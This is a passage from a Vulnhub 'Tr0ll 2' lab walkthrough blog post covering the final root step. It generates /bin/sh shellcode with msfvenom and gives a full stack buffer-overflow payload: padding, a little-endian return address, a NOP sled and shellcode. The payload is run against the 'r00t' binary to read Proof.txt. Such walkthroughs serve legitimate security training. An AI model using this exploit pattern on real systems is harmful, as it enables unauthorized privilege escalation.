</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/32.png" alt="ESP_value" /></p><p>Then we use msfvenom to create our shellcode with excluding the common bad characters which are the following</p><ul><li>\x00: null byte<li>\x0a: line feed<li>\x0d: carriage return</ul><p>These bad characters can break the shellcode and cause the exploit to fail.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c"># On kali terminal</span>
msfvenom <span class="nt">-p</span> linux/x86/exec <span class="nt">-f</span> py <span class="nv">CMD</span><span class="o">=</span><span class="s2">"/bin/sh"</span> <span class="nt">-b</span> <span class="s1">'\x00\x0a\x0d'</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/33.png" alt="msfvenom" /></p><p>Afterwards, we prepare our malicious input by modifying the ESP address to be in reverse order which is commonly known as little endian byte order. Then we run the program in the modified environment and pass to it our malicious input that contains the shellcode, and finally we got a root shell and Proof.txt file.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nb">env</span> - ./r00t <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A" * 268 + "\x80\xfc\xff\xbf" + "\x90" * 16 + "\xdb\xd6\xb8\xac\x61\x13\xf8\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\x59\x0b\x18\xa0\x38\x9e\x78\x38\x17\x7c\x0c\x5f\x0f\xad\x7d\xc8\xcf\xd9\xae\x6a\xa6\x77\x38\x89\x6a\x60\x32\x4e\x8a\x70\x6c\x2c\xe3\x1e\x5d\xc3\x9b\xde\xf6\x70\xd2\x3e\x35\xf6"'</span><span class="si">)</span>
<span class="nb">whoami
id
pwd
cd</span> /root
<span class="nb">ls
cat </span>Proof.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/34.png" alt="root" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/vulnhub/'>Vulnhub</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/vulnhub/" class="post-tag no-text-decoration" >vulnhub</a> <a href="/tags/boot2root/" class="post-tag no-text-decoration" >boot2root</a> <a href="/tags/ethical-hacking/" class="post-tag no-text-decoration" >ethical hacking</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Tr0ll 2 Vulnhub Walkthrough - Echo&url=https://mohamedaezzat.github.io/posts/troll2/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Tr0ll 2 Vulnhub Walkthrough - Echo&u=https://mohamedaezzat.github.io/posts/troll2/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Tr0ll 2 Vulnhub Walkthrough - Echo&url=https://mohamedaezzat.github.io/posts/troll2/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ethical-hacking/">ethical hacking</a> <a class="post-tag" href="/tags/boot2root/">boot2root</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/htb/">htb</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/troll1/"><div class="card-body"> <span class="timeago small" > Sep 9, 2019 <i class="unloaded">2019-09-09T18:01:38+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Tr0ll 1 Vulnhub Walkthrough</h3><div class="text-muted small"><p> Machine Info: Difficulty: Beginner Goal: Gain root access and get Proof.txt from the /root directory Network Scanning Netdiscover As we do every time, we run netdiscover to determine the tar...</p></div></div></a></div><div class="card"> <a href="/posts/Kioptrix1/"><div class="card-body"> <span class="timeago small" > Aug 31, 2019 <i class="unloaded">2019-08-31T00:15:21+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kioptrix Level 1 Vulnhub Walkthrough</h3><div class="text-muted small"><p> Machine Info Difficulty: Easy Goal: Gain root access Network Scanning Netdiscover We run netdiscover to get the IP address of kioptrix level 1 through the host-only adapter interface (eth1)...</p></div></div></a></div><div class="card"> <a href="/posts/kioptrix2/"><div class="card-body"> <span class="timeago small" > Sep 1, 2019 <i class="unloaded">2019-09-01T13:37:47+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kioptrix Level 2 Vulnhub Walkthrough</h3><div class="text-muted small"><p> Machine Info Difficulty: Easy Goal: Gain root access Network Scanning Netdiscover We run netdicover to get the target ip address through host-only adapter interface (eth1). # Kali linux ter...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/troll1/" class="btn btn-outline-primary"><p>Tr0ll 1 Vulnhub Walkthrough</p></a> <a href="/posts/portscanner/" class="btn btn-outline-primary"><p>Writing a port scanner using python</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://github.com/MohamedAEzzat">Mohamed Ezzat</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/ethical-hacking/">ethical hacking</a> <a class="post-tag" href="/tags/boot2root/">boot2root</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/htb/">htb</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://mohamedaezzat.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
